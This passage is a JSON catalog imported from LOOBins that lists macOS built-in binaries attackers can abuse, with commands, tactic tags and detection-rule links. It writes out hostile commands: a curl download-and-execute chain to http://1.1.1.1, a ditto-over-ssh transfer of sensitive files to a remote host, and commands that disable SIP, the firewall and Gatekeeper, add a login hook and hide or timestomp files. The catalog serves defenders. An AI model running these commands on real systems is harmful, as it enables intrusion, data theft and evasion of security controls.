loobins.json (319277B)
1 { 2 "repository": "https://github.com/infosecB/LOOBins", 3 "commit": "399e3c4bdddb55c7dc49beb20bfe43490eac1184", 4 "license": "GPL-3.0", 5 "techniques": [ 6 { 7 "id": "loobins:GetFileInfo:764efced340d4784", 8 "toolId": "loobins:GetFileInfo", 9 "toolName": "GetFileInfo", 10 "name": "Iterate through a directory to GetFileInfo", 11 "source": "LOOBins", 12 "platform": [ 13 "macOS" 14 ], 15 "capability": [ 16 "Discovery" 17 ], 18 "nativeCategory": [ 19 "Discovery" 20 ], 21 "command": "for FILE in ~/Downloads/*; do echo $(GetFileInfo $FILE) >> fileinfo.txt; sleep 2; done", 22 "description": "A bash or zsh oneliner can provide an attacker with information about specific files of interest.", 23 "mitre": [], 24 "fullPath": [ 25 "/usr/bin/GetFileInfo" 26 ], 27 "environment": [ 28 "Local host" 29 ], 30 "availability": "Built in", 31 "verification": "Upstream reference", 32 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 33 "detection": [ 34 { 35 "type": "No detections at time of publishing", 36 "value": "No detections at time of publishing" 37 } 38 ], 39 "references": [ 40 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/GetFileInfo.yml", 41 "https://macosbin.com/bin/getfileinfo" 42 ] 43 }, 44 { 45 "id": "loobins:SetFile:16396f8014d822c7", 46 "toolId": "loobins:SetFile", 47 "toolName": "SetFile", 48 "name": "Set a file or directory attribute to invisible", 49 "source": "LOOBins", 50 "platform": [ 51 "macOS" 52 ], 53 "capability": [ 54 "Persistence", 55 "Defense Evasion" 56 ], 57 "nativeCategory": [ 58 "Persistence", 59 "Defense Evasion" 60 ], 61 "command": "for FILE in ~/*; do echo $(SetFile -a V $FILE && echo $(GetFileInfo $FILE)) >> /tmp/fileinfo.txt; sleep 2; done", 62 "description": "A bash or zsh oneliner can allow an attacker to set the file attribute to invisible. This action can establish persistence and evade detection for malicious files on the system.", 63 "mitre": [], 64 "fullPath": [ 65 "/usr/bin/SetFile" 66 ], 67 "environment": [ 68 "Local host" 69 ], 70 "availability": "Built in", 71 "verification": "Upstream reference", 72 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 73 "detection": [ 74 { 75 "type": "No detections at time of publishing", 76 "value": "No detections at time of publishing" 77 } 78 ], 79 "references": [ 80 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/SetFile.yml", 81 "https://daringfireball.net/2008/04/the_invisible_bit" 82 ] 83 }, 84 { 85 "id": "loobins:SetFile:60497c149294fffb", 86 "toolId": "loobins:SetFile", 87 "toolName": "SetFile", 88 "name": "Change a file's creation and modification timestamps", 89 "source": "LOOBins", 90 "platform": [ 91 "macOS" 92 ], 93 "capability": [ 94 "Defense Evasion" 95 ], 96 "nativeCategory": [ 97 "Defense Evasion" 98 ], 99 "command": "SetFile -d \"04/25/2023 11:11:00\" -m \"04/25/2023 11:12:00\" targetfile.txt", 100 "description": "Setfile can be used with the -d and -m arguments to alter a file's creation and modification date, respectively.", 101 "mitre": [], 102 "fullPath": [ 103 "/usr/bin/SetFile" 104 ], 105 "environment": [ 106 "Local host" 107 ], 108 "availability": "Built in", 109 "verification": "Upstream reference", 110 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 111 "detection": [ 112 { 113 "type": "No detections at time of publishing", 114 "value": "No detections at time of publishing" 115 } 116 ], 117 "references": [ 118 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/SetFile.yml", 119 "https://daringfireball.net/2008/04/the_invisible_bit" 120 ] 121 }, 122 { 123 "id": "loobins:caffeinate:eed3d0d746ebad74", 124 "toolId": "loobins:caffeinate", 125 "toolName": "caffeinate", 126 "name": "Fork a process", 127 "source": "LOOBins", 128 "platform": [ 129 "macOS" 130 ], 131 "capability": [ 132 "Execution", 133 "Defense Evasion" 134 ], 135 "nativeCategory": [ 136 "Execution", 137 "Defense Evasion" 138 ], 139 "command": "caffeinate -i /tmp/evil", 140 "description": "Make caffeinate fork a process and hold an assertion that prevents idle sleep as long as that process is running", 141 "mitre": [], 142 "fullPath": [ 143 "/usr/bin/caffeinate" 144 ], 145 "environment": [ 146 "Local host" 147 ], 148 "availability": "Built in", 149 "verification": "Upstream reference", 150 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 151 "detection": [ 152 { 153 "type": "No detections at time of publishing", 154 "value": "No detections at time of publishing" 155 } 156 ], 157 "references": [ 158 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/caffeinate.yml", 159 "https://macosbin.com/bin/caffeinate", 160 "https://ss64.com/osx/caffeinate.html" 161 ] 162 }, 163 { 164 "id": "loobins:caffeinate:b64b930cbcc85165", 165 "toolId": "loobins:caffeinate", 166 "toolName": "caffeinate", 167 "name": "Prevent a sleep", 168 "source": "LOOBins", 169 "platform": [ 170 "macOS" 171 ], 172 "capability": [ 173 "Execution" 174 ], 175 "nativeCategory": [ 176 "Execution" 177 ], 178 "command": "caffeinate -u -t 14400", 179 "description": "Prevent a macOS from going to sleep for 4 hours (14400 seconds)", 180 "mitre": [], 181 "fullPath": [ 182 "/usr/bin/caffeinate" 183 ], 184 "environment": [ 185 "Local host" 186 ], 187 "availability": "Built in", 188 "verification": "Upstream reference", 189 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 190 "detection": [ 191 { 192 "type": "No detections at time of publishing", 193 "value": "No detections at time of publishing" 194 } 195 ], 196 "references": [ 197 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/caffeinate.yml", 198 "https://macosbin.com/bin/caffeinate", 199 "https://ss64.com/osx/caffeinate.html" 200 ] 201 }, 202 { 203 "id": "loobins:chflags:6dc222e2477a144c", 204 "toolId": "loobins:chflags", 205 "toolName": "chflags", 206 "name": "Hide a file", 207 "source": "LOOBins", 208 "platform": [ 209 "macOS" 210 ], 211 "capability": [ 212 "Defense Evasion" 213 ], 214 "nativeCategory": [ 215 "Defense Evasion" 216 ], 217 "command": "chflags hidden ~/evil", 218 "description": "Add the hidden flag to a file or directory to prevent it from being \nvisible in Finder and Terminal.", 219 "mitre": [], 220 "fullPath": [ 221 "/usr/bin/chflags" 222 ], 223 "environment": [ 224 "Local host" 225 ], 226 "availability": "Built in", 227 "verification": "Upstream reference", 228 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 229 "detection": [ 230 { 231 "type": "Sigma: Hidden Flag Set On File/Directory Via Chflags", 232 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" 233 } 234 ], 235 "references": [ 236 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/chflags.yml", 237 "https://ss64.com/mac/chflags.html", 238 "https://macosbin.com/bin/chflags", 239 "https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/" 240 ] 241 }, 242 { 243 "id": "loobins:chflags:657af3584bd20804", 244 "toolId": "loobins:chflags", 245 "toolName": "chflags", 246 "name": "Remove hidden flag", 247 "source": "LOOBins", 248 "platform": [ 249 "macOS" 250 ], 251 "capability": [ 252 "Defense Evasion" 253 ], 254 "nativeCategory": [ 255 "Defense Evasion" 256 ], 257 "command": "chflags nohidden ~/evil", 258 "description": "Remove the hidden flag to a file or directory to make it visible in Finder\nand Terminal.", 259 "mitre": [], 260 "fullPath": [ 261 "/usr/bin/chflags" 262 ], 263 "environment": [ 264 "Local host" 265 ], 266 "availability": "Built in", 267 "verification": "Upstream reference", 268 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 269 "detection": [ 270 { 271 "type": "Sigma: Hidden Flag Set On File/Directory Via Chflags", 272 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml" 273 } 274 ], 275 "references": [ 276 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/chflags.yml", 277 "https://ss64.com/mac/chflags.html", 278 "https://macosbin.com/bin/chflags", 279 "https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/" 280 ] 281 }, 282 { 283 "id": "loobins:codesign:7e467a3d8b50ed97", 284 "toolId": "loobins:codesign", 285 "toolName": "codesign", 286 "name": "Ad-hoc codesigning an app bundle", 287 "source": "LOOBins", 288 "platform": [ 289 "macOS" 290 ], 291 "capability": [ 292 "Defense Evasion" 293 ], 294 "nativeCategory": [ 295 "Defense Evasion" 296 ], 297 "command": "codesign --force --deep -s - MyApp.app", 298 "description": "This command forcefully re-signs the MyApp.app application with an ad-hoc signature, applying the signature deeply to all nested code within the app", 299 "mitre": [], 300 "fullPath": [ 301 "/usr/bin/codesign" 302 ], 303 "environment": [ 304 "Local host" 305 ], 306 "availability": "Built in", 307 "verification": "Upstream reference", 308 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 309 "detection": [ 310 { 311 "type": "Jamf Protect: Detect ad-hoc codesigning activity", 312 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/adhoc_codesigning.yaml" 313 } 314 ], 315 "references": [ 316 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/codesign.yml", 317 "https://www.sentinelone.com/blog/when-apple-admits-macos-malware-is-a-problem-its-time-to-take-notice/", 318 "https://ss64.com/mac/codesign.html" 319 ] 320 }, 321 { 322 "id": "loobins:csrutil:26103c8c140bf3a9", 323 "toolId": "loobins:csrutil", 324 "toolName": "csrutil", 325 "name": "Disable SIP", 326 "source": "LOOBins", 327 "platform": [ 328 "macOS" 329 ], 330 "capability": [ 331 "Defense Evasion" 332 ], 333 "nativeCategory": [ 334 "Defense Evasion" 335 ], 336 "command": "csrutil disable", 337 "description": "disable SIP (System Integrity Protection) - requires booting into recovery mode", 338 "mitre": [], 339 "fullPath": [ 340 "/usr/bin/csrutil" 341 ], 342 "environment": [ 343 "Local host" 344 ], 345 "availability": "Built in", 346 "verification": "Upstream reference", 347 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 348 "detection": [ 349 { 350 "type": "Sigma: System Integrity Protection (SIP) Disabled", 351 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" 352 }, 353 { 354 "type": "Sigma: System Integrity Protection (SIP) Enumeration", 355 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" 356 } 357 ], 358 "references": [ 359 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", 360 "https://developer.apple.com/forums/thread/4002", 361 "https://attack.mitre.org/techniques/T1518/001/", 362 "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" 363 ] 364 }, 365 { 366 "id": "loobins:csrutil:a0a1b78e4d71e620", 367 "toolId": "loobins:csrutil", 368 "toolName": "csrutil", 369 "name": "Disable authenticated-root", 370 "source": "LOOBins", 371 "platform": [ 372 "macOS" 373 ], 374 "capability": [ 375 "Defense Evasion" 376 ], 377 "nativeCategory": [ 378 "Defense Evasion" 379 ], 380 "command": "csrutil authenticated-root disable", 381 "description": "When authenticated-root is disabled, booting is allowed from non-sealed system snapshots - requires booting into recovery mode", 382 "mitre": [], 383 "fullPath": [ 384 "/usr/bin/csrutil" 385 ], 386 "environment": [ 387 "Local host" 388 ], 389 "availability": "Built in", 390 "verification": "Upstream reference", 391 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 392 "detection": [ 393 { 394 "type": "Sigma: System Integrity Protection (SIP) Disabled", 395 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" 396 }, 397 { 398 "type": "Sigma: System Integrity Protection (SIP) Enumeration", 399 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" 400 } 401 ], 402 "references": [ 403 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", 404 "https://developer.apple.com/forums/thread/4002", 405 "https://attack.mitre.org/techniques/T1518/001/", 406 "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" 407 ] 408 }, 409 { 410 "id": "loobins:csrutil:bc2665f645a68439", 411 "toolId": "loobins:csrutil", 412 "toolName": "csrutil", 413 "name": "Add a netboot server", 414 "source": "LOOBins", 415 "platform": [ 416 "macOS" 417 ], 418 "capability": [ 419 "Defense Evasion" 420 ], 421 "nativeCategory": [ 422 "Defense Evasion" 423 ], 424 "command": "csrutil netboot add <address>", 425 "description": "Insert a new IPv4 address in the list of allowed NetBoot sources", 426 "mitre": [], 427 "fullPath": [ 428 "/usr/bin/csrutil" 429 ], 430 "environment": [ 431 "Local host" 432 ], 433 "availability": "Built in", 434 "verification": "Upstream reference", 435 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 436 "detection": [ 437 { 438 "type": "Sigma: System Integrity Protection (SIP) Disabled", 439 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" 440 }, 441 { 442 "type": "Sigma: System Integrity Protection (SIP) Enumeration", 443 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" 444 } 445 ], 446 "references": [ 447 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", 448 "https://developer.apple.com/forums/thread/4002", 449 "https://attack.mitre.org/techniques/T1518/001/", 450 "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" 451 ] 452 }, 453 { 454 "id": "loobins:csrutil:3e74e76040ed06ba", 455 "toolId": "loobins:csrutil", 456 "toolName": "csrutil", 457 "name": "Map infrastructure", 458 "source": "LOOBins", 459 "platform": [ 460 "macOS" 461 ], 462 "capability": [ 463 "Discovery" 464 ], 465 "nativeCategory": [ 466 "Reconnaissance", 467 "Discovery" 468 ], 469 "command": "csrutil netboot list", 470 "description": "List allowed NetBoot sources", 471 "mitre": [], 472 "fullPath": [ 473 "/usr/bin/csrutil" 474 ], 475 "environment": [ 476 "Local host" 477 ], 478 "availability": "Built in", 479 "verification": "Upstream reference", 480 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 481 "detection": [ 482 { 483 "type": "Sigma: System Integrity Protection (SIP) Disabled", 484 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" 485 }, 486 { 487 "type": "Sigma: System Integrity Protection (SIP) Enumeration", 488 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" 489 } 490 ], 491 "references": [ 492 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", 493 "https://developer.apple.com/forums/thread/4002", 494 "https://attack.mitre.org/techniques/T1518/001/", 495 "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" 496 ] 497 }, 498 { 499 "id": "loobins:csrutil:33a98a8b396dd6ec", 500 "toolId": "loobins:csrutil", 501 "toolName": "csrutil", 502 "name": "Determine if SIP is enabled", 503 "source": "LOOBins", 504 "platform": [ 505 "macOS" 506 ], 507 "capability": [ 508 "Discovery" 509 ], 510 "nativeCategory": [ 511 "Discovery" 512 ], 513 "command": "csrutil status", 514 "description": "Determine if System Integrity Protection is enabled", 515 "mitre": [], 516 "fullPath": [ 517 "/usr/bin/csrutil" 518 ], 519 "environment": [ 520 "Local host" 521 ], 522 "availability": "Built in", 523 "verification": "Upstream reference", 524 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 525 "detection": [ 526 { 527 "type": "Sigma: System Integrity Protection (SIP) Disabled", 528 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" 529 }, 530 { 531 "type": "Sigma: System Integrity Protection (SIP) Enumeration", 532 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml" 533 } 534 ], 535 "references": [ 536 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml", 537 "https://developer.apple.com/forums/thread/4002", 538 "https://attack.mitre.org/techniques/T1518/001/", 539 "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" 540 ] 541 }, 542 { 543 "id": "loobins:defaults:2be370c95286961d", 544 "toolId": "loobins:defaults", 545 "toolName": "defaults", 546 "name": "Disable Gatekeeper's auto rearm functionality", 547 "source": "LOOBins", 548 "platform": [ 549 "macOS" 550 ], 551 "capability": [ 552 "Defense Evasion" 553 ], 554 "nativeCategory": [ 555 "Defense Evasion" 556 ], 557 "command": "sudo defaults write /Library/Preferences/com.apple.security GKAutoRearm -bool NO", 558 "description": "The following command can be used to disable Gatekeepers rearm functionality. This command requires root privileges.", 559 "mitre": [], 560 "fullPath": [ 561 "/usr/bin/defaults" 562 ], 563 "environment": [ 564 "Local host" 565 ], 566 "availability": "Built in", 567 "verification": "Upstream reference", 568 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 569 "detection": [ 570 { 571 "type": "No detections at time of publishing", 572 "value": "No detections at time of publishing" 573 } 574 ], 575 "references": [ 576 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", 577 "https://macos-defaults.com/", 578 "https://www.huntress.com/blog/insistence-on-persistence" 579 ] 580 }, 581 { 582 "id": "loobins:defaults:8f051a66b5fb0607", 583 "toolId": "loobins:defaults", 584 "toolName": "defaults", 585 "name": "Show mounted servers", 586 "source": "LOOBins", 587 "platform": [ 588 "macOS" 589 ], 590 "capability": [ 591 "Discovery" 592 ], 593 "nativeCategory": [ 594 "Discovery" 595 ], 596 "command": "defaults read com.apple.finder \"ShowMountedServersOnDesktop\"", 597 "description": "Show all mounted servers on the desktop.", 598 "mitre": [], 599 "fullPath": [ 600 "/usr/bin/defaults" 601 ], 602 "environment": [ 603 "Local host" 604 ], 605 "availability": "Built in", 606 "verification": "Upstream reference", 607 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 608 "detection": [ 609 { 610 "type": "No detections at time of publishing", 611 "value": "No detections at time of publishing" 612 } 613 ], 614 "references": [ 615 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", 616 "https://macos-defaults.com/", 617 "https://www.huntress.com/blog/insistence-on-persistence" 618 ] 619 }, 620 { 621 "id": "loobins:defaults:4052ddb76eee1951", 622 "toolId": "loobins:defaults", 623 "toolName": "defaults", 624 "name": "Add a login item to the current user", 625 "source": "LOOBins", 626 "platform": [ 627 "macOS" 628 ], 629 "capability": [ 630 "Persistence" 631 ], 632 "nativeCategory": [ 633 "Persistence" 634 ], 635 "command": "sudo defaults write /Library/Preferences/com.apple.loginwindow LoginHook gain_persistence.sh", 636 "description": "An attacker can use defaults to add a login hook in attempt to gain persistence. This command requires root privileges.", 637 "mitre": [], 638 "fullPath": [ 639 "/usr/bin/defaults" 640 ], 641 "environment": [ 642 "Local host" 643 ], 644 "availability": "Built in", 645 "verification": "Upstream reference", 646 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 647 "detection": [ 648 { 649 "type": "No detections at time of publishing", 650 "value": "No detections at time of publishing" 651 } 652 ], 653 "references": [ 654 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", 655 "https://macos-defaults.com/", 656 "https://www.huntress.com/blog/insistence-on-persistence" 657 ] 658 }, 659 { 660 "id": "loobins:defaults:16d24c230e14950e", 661 "toolId": "loobins:defaults", 662 "toolName": "defaults", 663 "name": "Get Active Directory user info from Jamf Connect", 664 "source": "LOOBins", 665 "platform": [ 666 "macOS" 667 ], 668 "capability": [ 669 "Discovery" 670 ], 671 "nativeCategory": [ 672 "Discovery" 673 ], 674 "command": "defaults read com.jamf.connect.state", 675 "description": "Retrieve Active Directory user info from Jamf Connect defaults configuration.", 676 "mitre": [], 677 "fullPath": [ 678 "/usr/bin/defaults" 679 ], 680 "environment": [ 681 "Local host" 682 ], 683 "availability": "Built in", 684 "verification": "Upstream reference", 685 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 686 "detection": [ 687 { 688 "type": "No detections at time of publishing", 689 "value": "No detections at time of publishing" 690 } 691 ], 692 "references": [ 693 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", 694 "https://macos-defaults.com/", 695 "https://www.huntress.com/blog/insistence-on-persistence" 696 ] 697 }, 698 { 699 "id": "loobins:defaults:1600168e079bee30", 700 "toolId": "loobins:defaults", 701 "toolName": "defaults", 702 "name": "Enable Firewall", 703 "source": "LOOBins", 704 "platform": [ 705 "macOS" 706 ], 707 "capability": [ 708 "Defense Evasion" 709 ], 710 "nativeCategory": [ 711 "Defense Evasion" 712 ], 713 "command": "sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 1", 714 "description": "Enables macOS' default firewall. This command requires root privileges.", 715 "mitre": [], 716 "fullPath": [ 717 "/usr/bin/defaults" 718 ], 719 "environment": [ 720 "Local host" 721 ], 722 "availability": "Built in", 723 "verification": "Upstream reference", 724 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 725 "detection": [ 726 { 727 "type": "No detections at time of publishing", 728 "value": "No detections at time of publishing" 729 } 730 ], 731 "references": [ 732 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", 733 "https://macos-defaults.com/", 734 "https://www.huntress.com/blog/insistence-on-persistence" 735 ] 736 }, 737 { 738 "id": "loobins:defaults:72f81c54c9acbf93", 739 "toolId": "loobins:defaults", 740 "toolName": "defaults", 741 "name": "Disable Firewall", 742 "source": "LOOBins", 743 "platform": [ 744 "macOS" 745 ], 746 "capability": [ 747 "Defense Evasion" 748 ], 749 "nativeCategory": [ 750 "Defense Evasion" 751 ], 752 "command": "sudo defaults write /Library/Preferences/com.apple.alf globalstate -int 0", 753 "description": "Disables macOS' default firewall. This command requires root privileges.", 754 "mitre": [], 755 "fullPath": [ 756 "/usr/bin/defaults" 757 ], 758 "environment": [ 759 "Local host" 760 ], 761 "availability": "Built in", 762 "verification": "Upstream reference", 763 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 764 "detection": [ 765 { 766 "type": "No detections at time of publishing", 767 "value": "No detections at time of publishing" 768 } 769 ], 770 "references": [ 771 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml", 772 "https://macos-defaults.com/", 773 "https://www.huntress.com/blog/insistence-on-persistence" 774 ] 775 }, 776 { 777 "id": "loobins:disown:e2c68d9f80308eca", 778 "toolId": "loobins:disown", 779 "toolName": "disown", 780 "name": "Start a process and remove it from the jobs table.", 781 "source": "LOOBins", 782 "platform": [ 783 "macOS" 784 ], 785 "capability": [ 786 "Persistence" 787 ], 788 "nativeCategory": [ 789 "Persistence" 790 ], 791 "command": "curl -O http://1.1.1.1/updated && chmod +x updated && ./updated & disown && pkill Terminal", 792 "description": "The following command downloads a remote binary, sets it to executable, executes the binary, disowns it from the shell it spawned from, and closes the terminal session.", 793 "mitre": [], 794 "fullPath": [ 795 "shell built-in command (bash)" 796 ], 797 "environment": [ 798 "Local host" 799 ], 800 "availability": "Built in", 801 "verification": "Upstream reference", 802 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 803 "detection": [ 804 { 805 "type": "No detection content at time of writing", 806 "value": "No detection content at time of writing" 807 } 808 ], 809 "references": [ 810 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/disown.yml", 811 "https://linux.die.net/man/1/disown", 812 "https://man7.org/linux/man-pages/man1/bash.1.html", 813 "https://www.esentire.com/blog/poseidon-stealer-uses-sora-ai-lure-to-infect-macos" 814 ] 815 }, 816 { 817 "id": "loobins:ditto:a669d3fe27d2b814", 818 "toolId": "loobins:ditto", 819 "toolName": "ditto", 820 "name": "Copy and compress sensitive data locally", 821 "source": "LOOBins", 822 "platform": [ 823 "macOS" 824 ], 825 "capability": [ 826 "Collection" 827 ], 828 "nativeCategory": [ 829 "Collection", 830 "Exfiltration" 831 ], 832 "command": "ditto -c -k --sequesterRsrc --keepParent /home/user/sensitive-files /tmp/l00t.zip", 833 "description": "The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.", 834 "mitre": [], 835 "fullPath": [ 836 "/usr/bin/ditto" 837 ], 838 "environment": [ 839 "Local host" 840 ], 841 "availability": "Built in", 842 "verification": "Upstream reference", 843 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 844 "detection": [ 845 { 846 "type": "No detection content at time of writing", 847 "value": "No detection content at time of writing" 848 } 849 ], 850 "references": [ 851 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", 852 "https://ss64.com/osx/ditto.html", 853 "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", 854 "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" 855 ] 856 }, 857 { 858 "id": "loobins:ditto:3956e8036c3f0ecc", 859 "toolId": "loobins:ditto", 860 "toolName": "ditto", 861 "name": "Remove extended attributes from a file", 862 "source": "LOOBins", 863 "platform": [ 864 "macOS" 865 ], 866 "capability": [ 867 "Collection" 868 ], 869 "nativeCategory": [ 870 "Collection", 871 "Exfiltration" 872 ], 873 "command": "ditto -c -k unsigned.app app.zip ditto -x -k app.zip unsigned.app 2>/dev/null", 874 "description": "ditto can be used to bypass Gatekeeper by removing the \"com.apple.quarantine\" extended attribute.", 875 "mitre": [], 876 "fullPath": [ 877 "/usr/bin/ditto" 878 ], 879 "environment": [ 880 "Local host" 881 ], 882 "availability": "Built in", 883 "verification": "Upstream reference", 884 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 885 "detection": [ 886 { 887 "type": "No detection content at time of writing", 888 "value": "No detection content at time of writing" 889 } 890 ], 891 "references": [ 892 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", 893 "https://ss64.com/osx/ditto.html", 894 "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", 895 "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" 896 ] 897 }, 898 { 899 "id": "loobins:ditto:cdd3c14f73ed66d6", 900 "toolId": "loobins:ditto", 901 "toolName": "ditto", 902 "name": "Copy, compress, and transfer sensitive data to a remote macOS host", 903 "source": "LOOBins", 904 "platform": [ 905 "macOS" 906 ], 907 "capability": [ 908 "Collection", 909 "Lateral Movement", 910 "Defense Evasion" 911 ], 912 "nativeCategory": [ 913 "Collection", 914 "Exfiltration", 915 "Lateral Movement", 916 "Defense Evasion" 917 ], 918 "command": "ditto -c --norsrc /home/user/sensitive-files - | ssh remote_host ditto -x --norsrc - /home/user/l00t", 919 "description": "The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.", 920 "mitre": [], 921 "fullPath": [ 922 "/usr/bin/ditto" 923 ], 924 "environment": [ 925 "Local host" 926 ], 927 "availability": "Built in", 928 "verification": "Upstream reference", 929 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 930 "detection": [ 931 { 932 "type": "No detection content at time of writing", 933 "value": "No detection content at time of writing" 934 } 935 ], 936 "references": [ 937 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml", 938 "https://ss64.com/osx/ditto.html", 939 "https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/", 940 "https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/" 941 ] 942 }, 943 { 944 "id": "loobins:ditto:46f00f81c5001006", 945 "toolId": "loobins:ditto", 946 "toolName": "ditto", 947 